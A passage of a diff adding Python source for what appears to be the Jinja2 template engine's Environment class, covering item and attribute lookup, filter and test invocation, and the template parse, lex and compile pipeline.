+        rv.extensions = {}
+        for key, value in self.extensions.items():
+            rv.extensions[key] = value.bind(rv)
+        if extensions is not missing:
+            rv.extensions.update(load_extensions(rv, extensions))
+
+        if enable_async is not missing:
+            rv.is_async = enable_async
+
+        return _environment_config_check(rv)
+
+    @property
+    def lexer(self) -> Lexer:
+        """The lexer for this environment."""
+        return get_lexer(self)
+
+    def iter_extensions(self) -> t.Iterator["Extension"]:
+        """Iterates over the extensions by priority."""
+        return iter(sorted(self.extensions.values(), key=lambda x: x.priority))
+
+    def getitem(
+        self, obj: t.Any, argument: t.Union[str, t.Any]
+    ) -> t.Union[t.Any, Undefined]:
+        """Get an item or attribute of an object but prefer the item."""
+        try:
+            return obj[argument]
+        except (AttributeError, TypeError, LookupError):
+            if isinstance(argument, str):
+                try:
+                    attr = str(argument)
+                except Exception:
+                    pass
+                else:
+                    try:
+                        return getattr(obj, attr)
+                    except AttributeError:
+                        pass
+        return self.undefined(obj=obj, name=argument)
+
+    def getattr(self, obj: t.Any, attribute: str) -> t.Any:
+        """Get an item or attribute of an object but prefer the attribute.
+        Unlike :meth:`getitem` the attribute *must* be a string.
+        """
+        try:
+            return getattr(obj, attribute)
+        except AttributeError:
+            pass
+        try:
+            return obj[attribute]
+        except (TypeError, LookupError, AttributeError):
+            return self.undefined(obj=obj, name=attribute)
+
+    def _filter_test_common(
+        self,
+        name: t.Union[str, Undefined],
+        value: t.Any,
+        args: t.Optional[t.Sequence[t.Any]],
+        kwargs: t.Optional[t.Mapping[str, t.Any]],
+        context: t.Optional[Context],
+        eval_ctx: t.Optional[EvalContext],
+        is_filter: bool,
+    ) -> t.Any:
+        if is_filter:
+            env_map = self.filters
+            type_name = "filter"
+        else:
+            env_map = self.tests
+            type_name = "test"
+
+        func = env_map.get(name)  # type: ignore
+
+        if func is None:
+            msg = f"No {type_name} named {name!r}."
+
+            if isinstance(name, Undefined):
+                try:
+                    name._fail_with_undefined_error()
+                except Exception as e:
+                    msg = f"{msg} ({e}; did you forget to quote the callable name?)"
+
+            raise TemplateRuntimeError(msg)
+
+        args = [value, *(args if args is not None else ())]
+        kwargs = kwargs if kwargs is not None else {}
+        pass_arg = _PassArg.from_obj(func)
+
+        if pass_arg is _PassArg.context:
+            if context is None:
+                raise TemplateRuntimeError(
+                    f"Attempted to invoke a context {type_name} without context."
+ ) + + args.insert(0, context) + elif pass_arg is _PassArg.eval_context: + if eval_ctx is None: + if context is not None: + eval_ctx = context.eval_ctx + else: + eval_ctx = EvalContext(self) + + args.insert(0, eval_ctx) + elif pass_arg is _PassArg.environment: + args.insert(0, self) + + return func(*args, **kwargs) + + def call_filter( + self, + name: str, + value: t.Any, + args: t.Optional[t.Sequence[t.Any]] = None, + kwargs: t.Optional[t.Mapping[str, t.Any]] = None, + context: t.Optional[Context] = None, + eval_ctx: t.Optional[EvalContext] = None, + ) -> t.Any: + """Invoke a filter on a value the same way the compiler does. + + This might return a coroutine if the filter is running from an + environment in async mode and the filter supports async + execution. It's your responsibility to await this if needed. + + .. versionadded:: 2.7 + """ + return self._filter_test_common( + name, value, args, kwargs, context, eval_ctx, True + ) + + def call_test( + self, + name: str, + value: t.Any, + args: t.Optional[t.Sequence[t.Any]] = None, + kwargs: t.Optional[t.Mapping[str, t.Any]] = None, + context: t.Optional[Context] = None, + eval_ctx: t.Optional[EvalContext] = None, + ) -> t.Any: + """Invoke a test on a value the same way the compiler does. + + This might return a coroutine if the test is running from an + environment in async mode and the test supports async execution. + It's your responsibility to await this if needed. + + .. versionchanged:: 3.0 + Tests support ``@pass_context``, etc. decorators. Added + the ``context`` and ``eval_ctx`` parameters. + + .. versionadded:: 2.7 + """ + return self._filter_test_common( + name, value, args, kwargs, context, eval_ctx, False + ) + + @internalcode + def parse( + self, + source: str, + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + ) -> nodes.Template: + """Parse the sourcecode and return the abstract syntax tree. This + tree of nodes is used by the compiler to convert the template into + executable source- or bytecode. This is useful for debugging or to + extract information from templates. + + If you are :ref:`developing Jinja extensions ` + this gives you a good overview of the node tree generated. + """ + try: + return self._parse(source, name, filename) + except TemplateSyntaxError: + self.handle_exception(source=source) + + def _parse( + self, source: str, name: t.Optional[str], filename: t.Optional[str] + ) -> nodes.Template: + """Internal parsing function used by `parse` and `compile`.""" + return Parser(self, source, name, filename).parse() + + def lex( + self, + source: str, + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + ) -> t.Iterator[t.Tuple[int, str, str]]: + """Lex the given sourcecode and return a generator that yields + tokens as tuples in the form ``(lineno, token_type, value)``. + This can be useful for :ref:`extension development ` + and debugging templates. + + This does not perform preprocessing. If you want the preprocessing + of the extensions to be applied you have to filter source through + the :meth:`preprocess` method. + """ + source = str(source) + try: + return self.lexer.tokeniter(source, name, filename) + except TemplateSyntaxError: + self.handle_exception(source=source) + + def preprocess( + self, + source: str, + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + ) -> str: + """Preprocesses the source with all extensions. 
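For illustration only, not part of the vendored file: a short sketch of how ``overlay`` and the ``call_filter`` / ``call_test`` helpers above behave; the overridden options and sample values are arbitrary.

.. code-block:: python

    from jinja2 import Environment

    env = Environment()

    # overlay() shares data with the parent environment but applies its own
    # overrides; existing extensions are re-bound to the new environment.
    text_env = env.overlay(trim_blocks=True, lstrip_blocks=True)
    assert text_env.overlayed and text_env.linked_to is env

    # call_filter()/call_test() invoke registered filters and tests the same
    # way compiled template code does, including @pass_* argument injection.
    env.call_filter("upper", "hello")               # -> 'HELLO'
    env.call_filter("join", [1, 2, 3], args=["-"])  # -> '1-2-3'
    env.call_test("defined", 42)                    # -> True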
This is automatically + called for all parsing and compiling methods but *not* for :meth:`lex` + because there you usually only want the actual source tokenized. + """ + return reduce( + lambda s, e: e.preprocess(s, name, filename), + self.iter_extensions(), + str(source), + ) + + def _tokenize( + self, + source: str, + name: t.Optional[str], + filename: t.Optional[str] = None, + state: t.Optional[str] = None, + ) -> TokenStream: + """Called by the parser to do the preprocessing and filtering + for all the extensions. Returns a :class:`~jinja2.lexer.TokenStream`. + """ + source = self.preprocess(source, name, filename) + stream = self.lexer.tokenize(source, name, filename, state) + + for ext in self.iter_extensions(): + stream = ext.filter_stream(stream) # type: ignore + + if not isinstance(stream, TokenStream): + stream = TokenStream(stream, name, filename) # type: ignore + + return stream + + def _generate( + self, + source: nodes.Template, + name: t.Optional[str], + filename: t.Optional[str], + defer_init: bool = False, + ) -> str: + """Internal hook that can be overridden to hook a different generate + method in. + + .. versionadded:: 2.5 + """ + return generate( # type: ignore + source, + self, + name, + filename, + defer_init=defer_init, + optimized=self.optimized, + ) + + def _compile(self, source: str, filename: str) -> CodeType: + """Internal hook that can be overridden to hook a different compile + method in. + + .. versionadded:: 2.5 + """ + return compile(source, filename, "exec") # type: ignore + + @typing.overload + def compile( # type: ignore + self, + source: t.Union[str, nodes.Template], + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + raw: "te.Literal[False]" = False, + defer_init: bool = False, + ) -> CodeType: + ... + + @typing.overload + def compile( + self, + source: t.Union[str, nodes.Template], + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + raw: "te.Literal[True]" = ..., + defer_init: bool = False, + ) -> str: + ... + + @internalcode + def compile( + self, + source: t.Union[str, nodes.Template], + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + raw: bool = False, + defer_init: bool = False, + ) -> t.Union[str, CodeType]: + """Compile a node or template source code. The `name` parameter is + the load name of the template after it was joined using + :meth:`join_path` if necessary, not the filename on the file system. + the `filename` parameter is the estimated filename of the template on + the file system. If the template came from a database or memory this + can be omitted. + + The return value of this method is a python code object. If the `raw` + parameter is `True` the return value will be a string with python + code equivalent to the bytecode returned otherwise. This method is + mainly used internally. + + `defer_init` is use internally to aid the module code generator. This + causes the generated code to be able to import without the global + environment variable to be set. + + .. versionadded:: 2.4 + `defer_init` parameter added. + """ + source_hint = None + try: + if isinstance(source, str): + source_hint = source + source = self._parse(source, name, filename) + source = self._generate(source, name, filename, defer_init=defer_init) + if raw: + return source + if filename is None: + filename = "
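For illustration only, not part of the vendored file: the parsing and compilation entry points above can also be called directly; the sample template string below is arbitrary.

.. code-block:: python

    from jinja2 import Environment
    from jinja2.meta import find_undeclared_variables

    env = Environment()
    source = "Hello {{ name | upper }}!"

    # parse() returns the template AST used by the compiler; jinja2.meta can
    # then answer questions such as which variables the template expects.
    ast = env.parse(source)
    find_undeclared_variables(ast)  # -> {'name'}

    # lex() yields (lineno, token_type, value) tuples without preprocessing.
    tokens = list(env.lex(source))

    # compile(..., raw=True) returns the generated Python source as a string
    # instead of a code object, which helps when debugging code generation.
    generated = env.compile(source, raw=True)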